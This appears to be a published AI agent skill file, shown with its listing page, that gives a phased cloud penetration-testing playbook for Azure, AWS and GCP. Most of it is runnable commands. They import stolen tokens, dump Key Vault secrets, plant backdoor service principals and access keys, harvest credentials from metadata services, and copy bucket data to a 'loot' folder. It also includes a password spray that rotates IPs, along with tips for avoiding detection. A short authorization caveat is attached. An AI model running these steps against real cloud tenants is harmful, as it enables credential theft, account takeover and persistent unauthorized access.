This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
Add this skill
npx mdskills install sickn33/cloud-penetration-testingComprehensive cloud pentesting guide with detailed commands across Azure, AWS, and GCP platforms
1---2name: Cloud Penetration Testing3description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.4metadata:5 author: zebbern6 version: "1.1"7---89# Cloud Penetration Testing1011## Purpose1213Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.1415## Prerequisites1617### Required Tools18```bash19# Azure tools20Install-Module -Name Az -AllowClobber -Force21Install-Module -Name MSOnline -Force22Install-Module -Name AzureAD -Force2324# AWS CLI25curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"26unzip awscliv2.zip && sudo ./aws/install2728# GCP CLI29curl https://sdk.cloud.google.com | bash30gcloud init3132# Additional tools33pip install scoutsuite pacu34```3536### Required Knowledge37- Cloud architecture fundamentals38- Identity and Access Management (IAM)39- API authentication mechanisms40- DevOps and automation concepts4142### Required Access43- Written authorization for testing44- Test credentials or access tokens45- Defined scope and rules of engagement4647## Outputs and Deliverables48491. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings502. **Resource Inventory** - Enumerated services, storage, and compute instances513. **Credential Findings** - Exposed secrets, keys, and misconfigurations524. **Remediation Recommendations** - Hardening guidance per platform5354## Core Workflow5556### Phase 1: Reconnaissance5758Gather initial information about target cloud presence:5960```bash61# Azure: Get federation info62curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"6364# Azure: Get Tenant ID65curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"6667# Enumerate cloud resources by company name68python3 cloud_enum.py -k targetcompany6970# Check IP against cloud providers71cat ips.txt | python3 ip2provider.py72```7374### Phase 2: Azure Authentication7576Authenticate to Azure environments:7778```powershell79# Az PowerShell Module80Import-Module Az81Connect-AzAccount8283# With credentials (may bypass MFA)84$credential = Get-Credential85Connect-AzAccount -Credential $credential8687# Import stolen context88Import-AzContext -Profile 'C:\Temp\StolenToken.json'8990# Export context for persistence91Save-AzContext -Path C:\Temp\AzureAccessToken.json9293# MSOnline Module94Import-Module MSOnline95Connect-MsolService96```9798### Phase 3: Azure Enumeration99100Discover Azure resources and permissions:101102```powershell103# List contexts and subscriptions104Get-AzContext -ListAvailable105Get-AzSubscription106107# Current user role assignments108Get-AzRoleAssignment109110# List resources111Get-AzResource112Get-AzResourceGroup113114# Storage accounts115Get-AzStorageAccount116117# Web applications118Get-AzWebApp119120# SQL Servers and databases121Get-AzSQLServer122Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG123124# Virtual machines125Get-AzVM126$vm = Get-AzVM -Name "VMName"127$vm.OSProfile128129# List all users130Get-MSolUser -All131132# List all groups133Get-MSolGroup -All134135# Global Admins136Get-MsolRole -RoleName "Company Administrator"137Get-MSolGroupMember -GroupObjectId $GUID138139# Service Principals140Get-MsolServicePrincipal141```142143### Phase 4: Azure Exploitation144145Exploit Azure misconfigurations:146147```powershell148# Search user attributes for passwords149$users = Get-MsolUser -All150foreach($user in $users){151 $props = @()152 $user | Get-Member | foreach-object{$props+=$_.Name}153 foreach($prop in $props){154 if($user.$prop -like "*password*"){155 Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)156 }157 }158}159160# Execute commands on VMs161Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1162163# Extract VM UserData164$vms = Get-AzVM165$vms.UserData166167# Dump Key Vault secrets168az keyvault list --query '[].name' --output tsv169az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list170az keyvault secret list --vault-name <vault> --query '[].id' --output tsv171az keyvault secret show --id <URI>172```173174### Phase 5: Azure Persistence175176Establish persistence in Azure:177178```powershell179# Create backdoor service principal180$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner181$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)182$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)183184# Add service principal to Global Admin185$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>186$role = Get-MsolRole -RoleName "Company Administrator"187Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId188189# Login as service principal190$cred = Get-Credential # AppID as username, secret as password191Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal192193# Create new admin user via CLI194az ad user create --display-name <name> --password <pass> --user-principal-name <upn>195```196197### Phase 6: AWS Authentication198199Authenticate to AWS environments:200201```bash202# Configure AWS CLI203aws configure204# Enter: Access Key ID, Secret Access Key, Region, Output format205206# Use specific profile207aws configure --profile target208209# Test credentials210aws sts get-caller-identity211```212213### Phase 7: AWS Enumeration214215Discover AWS resources:216217```bash218# Account information219aws sts get-caller-identity220aws iam list-users221aws iam list-roles222223# S3 Buckets224aws s3 ls225aws s3 ls s3://bucket-name/226aws s3 sync s3://bucket-name ./local-dir227228# EC2 Instances229aws ec2 describe-instances230231# RDS Databases232aws rds describe-db-instances --region us-east-1233234# Lambda Functions235aws lambda list-functions --region us-east-1236aws lambda get-function --function-name <name>237238# EKS Clusters239aws eks list-clusters --region us-east-1240241# Networking242aws ec2 describe-subnets243aws ec2 describe-security-groups --group-ids <sg-id>244aws directconnect describe-connections245```246247### Phase 8: AWS Exploitation248249Exploit AWS misconfigurations:250251```bash252# Check for public RDS snapshots253aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier254aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>255# AttributeValues = "all" means publicly accessible256257# Extract Lambda environment variables (may contain secrets)258aws lambda get-function --function-name <name> | jq '.Configuration.Environment'259260# Access metadata service (from compromised EC2)261curl http://169.254.169.254/latest/meta-data/262curl http://169.254.169.254/latest/meta-data/iam/security-credentials/263264# IMDSv2 access265TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")266curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"267```268269### Phase 9: AWS Persistence270271Establish persistence in AWS:272273```bash274# List existing access keys275aws iam list-access-keys --user-name <username>276277# Create backdoor access key278aws iam create-access-key --user-name <username>279280# Get all EC2 public IPs281for region in $(cat regions.txt); do282 aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'283done284```285286### Phase 10: GCP Enumeration287288Discover GCP resources:289290```bash291# Authentication292gcloud auth login293gcloud auth activate-service-account --key-file creds.json294gcloud auth list295296# Account information297gcloud config list298gcloud organizations list299gcloud projects list300301# IAM Policies302gcloud organizations get-iam-policy <org-id>303gcloud projects get-iam-policy <project-id>304305# Enabled services306gcloud services list307308# Source code repos309gcloud source repos list310gcloud source repos clone <repo>311312# Compute instances313gcloud compute instances list314gcloud beta compute ssh --zone "region" "instance" --project "project"315316# Storage buckets317gsutil ls318gsutil ls -r gs://bucket-name319gsutil cp gs://bucket/file ./local320321# SQL instances322gcloud sql instances list323gcloud sql databases list --instance <id>324325# Kubernetes326gcloud container clusters list327gcloud container clusters get-credentials <cluster> --region <region>328kubectl cluster-info329```330331### Phase 11: GCP Exploitation332333Exploit GCP misconfigurations:334335```bash336# Get metadata service data337curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"338339# Check access scopes340curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'341342# Decrypt data with keyring343gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global344345# Serverless function analysis346gcloud functions list347gcloud functions describe <name>348gcloud functions logs read <name> --limit 100349350# Find stored credentials351sudo find /home -name "credentials.db"352sudo cp -r /home/user/.config/gcloud ~/.config353gcloud auth list354```355356## Quick Reference357358### Azure Key Commands359360| Action | Command |361|--------|---------|362| Login | `Connect-AzAccount` |363| List subscriptions | `Get-AzSubscription` |364| List users | `Get-MsolUser -All` |365| List groups | `Get-MsolGroup -All` |366| Current roles | `Get-AzRoleAssignment` |367| List VMs | `Get-AzVM` |368| List storage | `Get-AzStorageAccount` |369| Key Vault secrets | `az keyvault secret list --vault-name <name>` |370371### AWS Key Commands372373| Action | Command |374|--------|---------|375| Configure | `aws configure` |376| Caller identity | `aws sts get-caller-identity` |377| List users | `aws iam list-users` |378| List S3 buckets | `aws s3 ls` |379| List EC2 | `aws ec2 describe-instances` |380| List Lambda | `aws lambda list-functions` |381| Metadata | `curl http://169.254.169.254/latest/meta-data/` |382383### GCP Key Commands384385| Action | Command |386|--------|---------|387| Login | `gcloud auth login` |388| List projects | `gcloud projects list` |389| List instances | `gcloud compute instances list` |390| List buckets | `gsutil ls` |391| List clusters | `gcloud container clusters list` |392| IAM policy | `gcloud projects get-iam-policy <project>` |393| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |394395### Metadata Service URLs396397| Provider | URL |398|----------|-----|399| AWS | `http://169.254.169.254/latest/meta-data/` |400| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |401| GCP | `http://metadata.google.internal/computeMetadata/v1/` |402403### Useful Tools404405| Tool | Purpose |406|------|---------|407| ScoutSuite | Multi-cloud security auditing |408| Pacu | AWS exploitation framework |409| AzureHound | Azure AD attack path mapping |410| ROADTools | Azure AD enumeration |411| WeirdAAL | AWS service enumeration |412| MicroBurst | Azure security assessment |413| PowerZure | Azure post-exploitation |414415## Constraints and Limitations416417### Legal Requirements418- Only test with explicit written authorization419- Respect scope boundaries between cloud accounts420- Do not access production customer data421- Document all testing activities422423### Technical Limitations424- MFA may prevent credential-based attacks425- Conditional Access policies may restrict access426- CloudTrail/Activity Logs record all API calls427- Some resources require specific regional access428429### Detection Considerations430- Cloud providers log all API activity431- Unusual access patterns trigger alerts432- Use slow, deliberate enumeration433- Consider GuardDuty, Security Center, Cloud Armor434435## Examples436437### Example 1: Azure Password Spray438439**Scenario:** Test Azure AD password policy440441```powershell442# Using MSOLSpray with FireProx for IP rotation443# First create FireProx endpoint444python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create445446# Spray passwords447Import-Module .\MSOLSpray.ps1448Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox449```450451### Example 2: AWS S3 Bucket Enumeration452453**Scenario:** Find and access misconfigured S3 buckets454455```bash456# List all buckets457aws s3 ls | awk '{print $3}' > buckets.txt458459# Check each bucket for contents460while read bucket; do461 echo "Checking: $bucket"462 aws s3 ls s3://$bucket 2>/dev/null463done < buckets.txt464465# Download interesting bucket466aws s3 sync s3://misconfigured-bucket ./loot/467```468469### Example 3: GCP Service Account Compromise470471**Scenario:** Pivot using compromised service account472473```bash474# Authenticate with service account key475gcloud auth activate-service-account --key-file compromised-sa.json476477# List accessible projects478gcloud projects list479480# Enumerate compute instances481gcloud compute instances list --project target-project482483# Check for SSH keys in metadata484gcloud compute project-info describe --project target-project | grep ssh485486# SSH to instance487gcloud beta compute ssh instance-name --zone us-central1-a --project target-project488```489490## Troubleshooting491492| Issue | Solutions |493|-------|-----------|494| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |495| Permission denied | List current roles; try different resources; check resource policies; verify region |496| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |497| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |498499## References500501- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation502
Full transparency — inspect the skill content before installing.